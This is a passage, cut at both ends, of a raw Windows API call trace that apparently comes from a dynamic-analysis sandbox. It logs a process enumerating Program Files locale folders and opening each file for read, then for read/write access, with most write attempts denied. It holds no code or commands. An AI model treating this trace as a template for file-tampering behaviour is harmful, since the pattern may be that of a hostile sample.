dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.581] GetLastError () returned 0x5 [0100.581] GetLastError () returned 0x5 [0100.581] SetLastError (dwErrCode=0x5) [0100.581] GetLastError () returned 0x5 [0100.581] SetLastError (dwErrCode=0x5) [0100.581] GetLastError () returned 0x5 [0100.581] SetLastError (dwErrCode=0x5) [0100.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0100.581] AreFileApisANSI () returned 1 [0100.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.581] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0100.581] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR") returned 57 [0100.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.581] GetLastError () returned 0x5 [0100.581] GetLastError () returned 0x5 [0100.581] SetLastError (dwErrCode=0x5) [0100.581] GetLastError () returned 0x5 [0100.581] SetLastError (dwErrCode=0x5) [0100.581] GetLastError () returned 0x5 [0100.581] SetLastError (dwErrCode=0x5) [0100.581] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0100.582] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.582] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.582] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.582] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.582] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.582] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x781d0 [0100.582] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080d988, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.582] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.582] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.582] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46908 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0100.583] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.583] AreFileApisANSI () returned 1 [0100.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0100.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.583] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.583] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.584] AreFileApisANSI () returned 1 [0100.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.584] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85940 [0100.584] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned 73 [0100.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.584] GetFileType (hFile=0x27c) returned 0x1 [0100.584] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0100.584] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.585] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.585] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.585] CloseHandle (hObject=0x27c) returned 1 [0100.585] AreFileApisANSI () returned 1 [0100.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.585] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85b20 [0100.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui") returned 73 [0100.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-BR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-br\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.586] GetLastError () returned 0x5 [0100.586] GetLastError () returned 0x5 [0100.586] SetLastError (dwErrCode=0x5) [0100.586] GetLastError () returned 0x5 [0100.586] SetLastError (dwErrCode=0x5) [0100.586] GetLastError () returned 0x5 [0100.586] SetLastError (dwErrCode=0x5) [0100.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0100.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.586] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0100.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.586] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.586] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d0d8, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0100.586] FindClose (in: hFindFile=0x781d0 | out: hFindFile=0x781d0) returned 1 [0100.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.586] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0100.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.587] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.587] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.587] AreFileApisANSI () returned 1 [0100.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT", lpUsedDefaultChar=0x0) returned 57 [0100.587] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.588] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.588] AreFileApisANSI () returned 1 [0100.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.588] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 57 [0100.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.588] GetLastError () returned 0x5 [0100.588] GetLastError () returned 0x5 [0100.588] SetLastError (dwErrCode=0x5) [0100.588] GetLastError () returned 0x5 [0100.588] SetLastError (dwErrCode=0x5) [0100.588] GetLastError () returned 0x5 [0100.589] SetLastError (dwErrCode=0x5) [0100.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.589] AreFileApisANSI () returned 1 [0100.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.589] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.589] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT") returned 57 [0100.589] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\pt-pt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.589] GetLastError () returned 0x5 [0100.589] GetLastError () returned 0x5 [0100.589] SetLastError (dwErrCode=0x5) [0100.589] GetLastError () returned 0x5 [0100.589] SetLastError (dwErrCode=0x5) [0100.589] GetLastError () returned 0x5 [0100.589] SetLastError (dwErrCode=0x5) [0100.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.589] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0100.589] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.590] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60138 [0100.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0100.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60138 | out: hHeap=0x20000) returned 1 [0100.590] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ro-RO", cAlternateFileName="")) returned 1 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e580 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0100.590] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\pt-PT\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78150 [0100.590] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ddb8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.590] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e8e6bbf, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e8e6bbf, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e8e6bbf, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.590] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.590] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.591] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: 